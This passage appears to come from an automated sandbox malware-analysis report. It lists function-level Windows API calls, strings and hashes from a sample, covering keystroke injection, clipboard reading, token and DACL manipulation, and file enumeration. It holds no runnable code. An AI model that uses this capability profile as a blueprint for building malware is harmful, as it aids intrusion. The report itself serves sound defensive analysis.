                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: 0e839e2b70041ca2eb664bb653471b892590581f663469870598ae1defca1f80
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: 8531C175A001099FC71ADF59D4C0A69FBE5FB4A300B2986A5E80ACF65AD731EDC1CBD0
                        Function 0138229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 013822B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction ID: 46f21150828518c1db773b9d6add362cd1719e6dc8d4835be9debea37356eb5c
                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction Fuzzy Hash: CBE0BF7494020EEFDB00EFA4D5496DE7BB4EF04311F1005A1FD05D7681DB319E54CA62
                        Function 013822A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 013822B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 0f1d38c43c0c3a943d2cd47e81799e53e9082eea5b9db9564d3e14271f771581
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: 44E0E67494020EDFDB00EFB4D54969E7FB4EF04301F100161FD01D2281D6319D50CA72

                        Non-executed Functions

                        Function 003C9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003C961A
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003C965B
                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 003C969F
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003C96C9
                        • SendMessageW.USER32 ref: 003C96F2
                        • GetKeyState.USER32(00000011), ref: 003C978B
                        • GetKeyState.USER32(00000009), ref: 003C9798
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003C97AE
                        • GetKeyState.USER32(00000010), ref: 003C97B8
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003C97E9
                        • SendMessageW.USER32 ref: 003C9810
                        • SendMessageW.USER32(?,00001030,?,003C7E95), ref: 003C9918
                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003C992E
                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003C9941
                        • SetCapture.USER32(?), ref: 003C994A
                        • ClientToScreen.USER32(?,?), ref: 003C99AF
                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003C99BC
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C99D6
                        • ReleaseCapture.USER32 ref: 003C99E1
                        • GetCursorPos.USER32(?), ref: 003C9A19
                        • ScreenToClient.USER32(?,?), ref: 003C9A26
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003C9A80
                        • SendMessageW.USER32 ref: 003C9AAE
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003C9AEB
                        • SendMessageW.USER32 ref: 003C9B1A
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003C9B3B
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003C9B4A
                        • GetCursorPos.USER32(?), ref: 003C9B68
                        • ScreenToClient.USER32(?,?), ref: 003C9B75
                        • GetParent.USER32(?), ref: 003C9B93
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003C9BFA
                        • SendMessageW.USER32 ref: 003C9C2B
                        • ClientToScreen.USER32(?,?), ref: 003C9C84
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003C9CB4
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003C9CDE
                        • SendMessageW.USER32 ref: 003C9D01
                        • ClientToScreen.USER32(?,?), ref: 003C9D4E
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003C9D82
                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C9E05
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                        • String ID: @GUI_DRAGID$F$p#@
                        • API String ID: 3429851547-2648032285
                        • Opcode ID: cbc28aeb089667235144f86b62906449acdce280d2217bec7e0506958bb109cd
                        • Instruction ID: af9508be6e0fb572f4d1409759fb21310d8a1905771202ecbed07574a2db8918
                        • Opcode Fuzzy Hash: cbc28aeb089667235144f86b62906449acdce280d2217bec7e0506958bb109cd
                        • Instruction Fuzzy Hash: 44427A75204200AFD726CF24CD48FAABBE9EF49320F16461EF599D72A1D731AD60CB41
                        Function 003C4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003C48F3
                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 003C4908
                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 003C4927
                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 003C494B
                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 003C495C
                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 003C497B
                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003C49AE
                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003C49D4
                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 003C4A0F
                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 003C4A56
                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 003C4A7E
                        • IsMenu.USER32(?), ref: 003C4A97
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C4AF2
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C4B20
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C4B94
                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 003C4BE3
                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 003C4C82
                        • wsprintfW.USER32 ref: 003C4CAE
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C4CC9
                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 003C4CF1
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C4D13
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C4D33
                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 003C4D5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                        • String ID: %d/%02d/%02d
                        • API String ID: 4054740463-328681919
                        • Opcode ID: c614d947654e7d792b6ed9b04028103ad29e7d0112ed7e93577c913bf33500e0
                        • Instruction ID: bdb6218166c7d323c4c120638b7c2ef9361ad7744affc44735fe87b1533bc78e
                        • Opcode Fuzzy Hash: c614d947654e7d792b6ed9b04028103ad29e7d0112ed7e93577c913bf33500e0
                        • Instruction Fuzzy Hash: 9112EF71600214ABEB269F28CD59FAEBBF8EF45310F14412DF51AEA2E1DB74AD41CB50
                        Function 0034F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0034F998
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0038F474
                        • IsIconic.USER32(00000000), ref: 0038F47D
                        • ShowWindow.USER32(00000000,00000009), ref: 0038F48A
                        • SetForegroundWindow.USER32(00000000), ref: 0038F494
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0038F4AA
                        • GetCurrentThreadId.KERNEL32 ref: 0038F4B1
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0038F4BD
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0038F4CE
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0038F4D6
                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0038F4DE
                        • SetForegroundWindow.USER32(00000000), ref: 0038F4E1
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F4F6
                        • keybd_event.USER32(00000012,00000000), ref: 0038F501
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F50B
                        • keybd_event.USER32(00000012,00000000), ref: 0038F510
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F519
                        • keybd_event.USER32(00000012,00000000), ref: 0038F51E
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F528
                        • keybd_event.USER32(00000012,00000000), ref: 0038F52D
                        • SetForegroundWindow.USER32(00000000), ref: 0038F530
                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0038F557
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 4125248594-2988720461
                        • Opcode ID: bf10ecbd11464f565d320006afe6fa6795f23f6ea226e4c30e83fbc96c782cd9
                        • Instruction ID: c1d1e841566c22dbec90070190faa570de5ddaa237eebe1dddbc9bcbce59ce55
                        • Opcode Fuzzy Hash: bf10ecbd11464f565d320006afe6fa6795f23f6ea226e4c30e83fbc96c782cd9
                        • Instruction Fuzzy Hash: C531A671A50318BFEB226BB64C4AFBF7E6CEB45B50F151066F604E61D1C7B06D00AB60
                        Function 00391201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 003916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
                          • Part of subcall function 003916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
                          • Part of subcall function 003916C3: GetLastError.KERNEL32 ref: 0039174A
                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00391286
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003912A8
                        • CloseHandle.KERNEL32(?), ref: 003912B9
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003912D1
                        • GetProcessWindowStation.USER32 ref: 003912EA
                        • SetProcessWindowStation.USER32(00000000), ref: 003912F4
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00391310
                          • Part of subcall function 003910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003911FC), ref: 003910D4
                          • Part of subcall function 003910BF: CloseHandle.KERNEL32(?,?,003911FC), ref: 003910E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                        • String ID: $default$winsta0$Z?
                        • API String ID: 22674027-1168915105
                        • Opcode ID: d0c71834102cefe1758d7a3082ba2f424522eb4ff9f9da16466b5e1af0ef0c46
                        • Instruction ID: 1c43c8cd50b94dfa47795b87a2dd47e63585fc2eec4c31ef8b3326d562d0d6bb
                        • Opcode Fuzzy Hash: d0c71834102cefe1758d7a3082ba2f424522eb4ff9f9da16466b5e1af0ef0c46
                        • Instruction Fuzzy Hash: 2F818B7190020AAFEF229FA5DC49FEE7BB9EF08704F184129FA14F61A0C7319954CB20
                        Function 00390B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
                          • Part of subcall function 003910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
                          • Part of subcall function 003910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
                          • Part of subcall function 003910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00390BCC
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00390C00
                        • GetLengthSid.ADVAPI32(?), ref: 00390C17
                        • GetAce.ADVAPI32(?,00000000,?), ref: 00390C51
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00390C6D
                        • GetLengthSid.ADVAPI32(?), ref: 00390C84
                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00390C8C
                        • HeapAlloc.KERNEL32(00000000), ref: 00390C93
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00390CB4
                        • CopySid.ADVAPI32(00000000), ref: 00390CBB
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00390CEA
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00390D0C
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00390D1E
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D45
                        • HeapFree.KERNEL32(00000000), ref: 00390D4C
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D55
                        • HeapFree.KERNEL32(00000000), ref: 00390D5C
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D65
                        • HeapFree.KERNEL32(00000000), ref: 00390D6C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00390D78
                        • HeapFree.KERNEL32(00000000), ref: 00390D7F
                          • Part of subcall function 00391193: GetProcessHeap.KERNEL32(00000008,00390BB1,?,00000000,?,00390BB1,?), ref: 003911A1
                          • Part of subcall function 00391193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00390BB1,?), ref: 003911A8
                          • Part of subcall function 00391193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00390BB1,?), ref: 003911B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                        • String ID:
                        • API String ID: 4175595110-0
                        • Opcode ID: fe98da2956d33a20392d21ccc3817494a777b1dbb92b7143a1a32824ef19fd52
                        • Instruction ID: 9124ea8c7de129564b17392fe9250bcfef17763c0f886c2ed4d6ad8d3d73d61a
                        • Opcode Fuzzy Hash: fe98da2956d33a20392d21ccc3817494a777b1dbb92b7143a1a32824ef19fd52
                        • Instruction Fuzzy Hash: 2771587290021AAFDF16DFA5DC48FAEBBBCBF04304F054615E919E6291D771EA05CBA0
                        Function 003AEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(003CCC08), ref: 003AEB29
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 003AEB37
                        • GetClipboardData.USER32(0000000D), ref: 003AEB43
                        • CloseClipboard.USER32 ref: 003AEB4F
                        • GlobalLock.KERNEL32(00000000), ref: 003AEB87
                        • CloseClipboard.USER32 ref: 003AEB91
                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 003AEBBC
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 003AEBC9
                        • GetClipboardData.USER32(00000001), ref: 003AEBD1
                        • GlobalLock.KERNEL32(00000000), ref: 003AEBE2
                        • GlobalUnlock.KERNEL32(00000000,?), ref: 003AEC22
                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 003AEC38
                        • GetClipboardData.USER32(0000000F), ref: 003AEC44
                        • GlobalLock.KERNEL32(00000000), ref: 003AEC55
                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 003AEC77
                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003AEC94
                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003AECD2
                        • GlobalUnlock.KERNEL32(00000000,?,?), ref: 003AECF3
                        • CountClipboardFormats.USER32 ref: 003AED14
                        • CloseClipboard.USER32 ref: 003AED59
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                        • String ID:
                        • API String ID: 420908878-0
                        • Opcode ID: 82130fe0ce43d044762da52469f652e50ba1c5662546efe4e3d8bbb1e0387665
                        • Instruction ID: bab2532d7984057a3522fbec8864975af97964e1b534fa44c0b70d3eb5d37218
                        • Opcode Fuzzy Hash: 82130fe0ce43d044762da52469f652e50ba1c5662546efe4e3d8bbb1e0387665
                        • Instruction Fuzzy Hash: 7D61F435208301AFD302EF24D899F2AB7A8EF85714F09555DF45ADB2A1CB31ED06CB62
                        Function 003A698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 003A69BE
                        • FindClose.KERNEL32(00000000), ref: 003A6A12
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003A6A4E
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003A6A75
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 003A6AB2
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 003A6ADF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                        • API String ID: 3830820486-3289030164
                        • Opcode ID: b896ae42863568b97ec5f52bee3efd70a8a84cdaa7b90c64ca3a9cd5510e8fdb
                        • Instruction ID: 8a57dee008a88b93b18a58b5d539707f4d384203e835906b37b0f6105918e19f
                        • Opcode Fuzzy Hash: b896ae42863568b97ec5f52bee3efd70a8a84cdaa7b90c64ca3a9cd5510e8fdb
                        • Instruction Fuzzy Hash: 91D160B2508300AFC715EBA4C986EABB7ECEF89704F04491DF585DB191EB74DA44CB62
                        Function 003A9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 003A9663
                        • GetFileAttributesW.KERNEL32(?), ref: 003A96A1
                        • SetFileAttributesW.KERNEL32(?,?), ref: 003A96BB
                        • FindNextFileW.KERNEL32(00000000,?), ref: 003A96D3
                        • FindClose.KERNEL32(00000000), ref: 003A96DE
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003A96FA
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A974A
                        • SetCurrentDirectoryW.KERNEL32(003F6B7C), ref: 003A9768
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A9772
                        • FindClose.KERNEL32(00000000), ref: 003A977F
                        • FindClose.KERNEL32(00000000), ref: 003A978F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1409584000-438819550
                        • Opcode ID: f844ab44184a2a134b4b864076b12cfd988e8aa521e1c09a7fdee7f0efd0fb57
                        • Instruction ID: 7b63f622de64c7e50bc6dc2d29264e7d833c5ece09189830cdfc39f2a16236f9
                        • Opcode Fuzzy Hash: f844ab44184a2a134b4b864076b12cfd988e8aa521e1c09a7fdee7f0efd0fb57
                        • Instruction Fuzzy Hash: 4A31B0325002196ADF16AFB5EC09FEE77ACDF4A321F114596E909E21A0DB35ED448B20
                        Function 003A979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 003A97BE
                        • FindNextFileW.KERNEL32(00000000,?), ref: 003A9819
                        • FindClose.KERNEL32(00000000), ref: 003A9824
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003A9840
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A9890
                        • SetCurrentDirectoryW.KERNEL32(003F6B7C), ref: 003A98AE
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A98B8
                        • FindClose.KERNEL32(00000000), ref: 003A98C5
                        • FindClose.KERNEL32(00000000), ref: 003A98D5
                          • Part of subcall function 0039DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0039DB00
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 2640511053-438819550
